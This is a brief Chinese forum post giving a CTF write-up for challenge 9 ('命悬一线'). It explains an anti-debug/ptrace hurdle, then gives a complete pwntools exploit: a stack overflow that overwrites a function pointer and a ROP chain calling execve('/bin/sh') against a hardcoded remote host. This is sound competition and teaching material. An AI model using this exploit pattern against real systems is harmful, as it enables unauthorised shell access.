-
-
[原创]第九题 命悬一线 writeup
-
发表于: 2020-12-9 19:01
-
比较忙,不能详写了,说下思路
题目最大的难点应该是打印的那句话
1 | Please run in docker! |
还有这个
第二天下好安装下来发现运行程序还是没得输入的地方
傻傻的安装好环境,运行还是
1 | Please run in docker! |
不禁感慨作者有点阴险
然后拖进去仔细调仔细看发现应该是附加上才有输出,感觉像是作者发错程序了,ptrace那应该是等于0进入异常吧
栈溢出,然后覆盖后面得函数指针
然后执行syscall那个地方rdx,rcx都得等于0
所以执行两次就能满足条件
一句话就能搞定了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | #!/usr/bin/env python2from pwn import *import sysimport oshost, port = "121.36.145.157",9999local = 0if local: p = process('./pwn1')else: p = remote(host, port)context.arch = 'amd64'#t=input()payload='/bin/sh\x00'+'A'*0x10+p64(0x4016CA)payload=payload.ljust(0x78,'A')+p64(0x40185A)payload=payload.ljust(0xa0,'A')payload+=p64(0x6020C0)+p64(512)payload+=p64(0x4017e3)+p64(0x401863)+p64(59)+p64(0x401861)+p64(0x6020C0)+p64(0x0)+p64(0x4017CC)+p64(0x4017e3)+p64(0x401863)+p64(59)+p64(0x401861)+p64(0x6020C0)+p64(0x0)+p64(0x4017CC)payload=payload.ljust(512,'A')p.send(payload)p.interactive() |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2020-12-9 19:05
被大帅锅编辑
,原因:
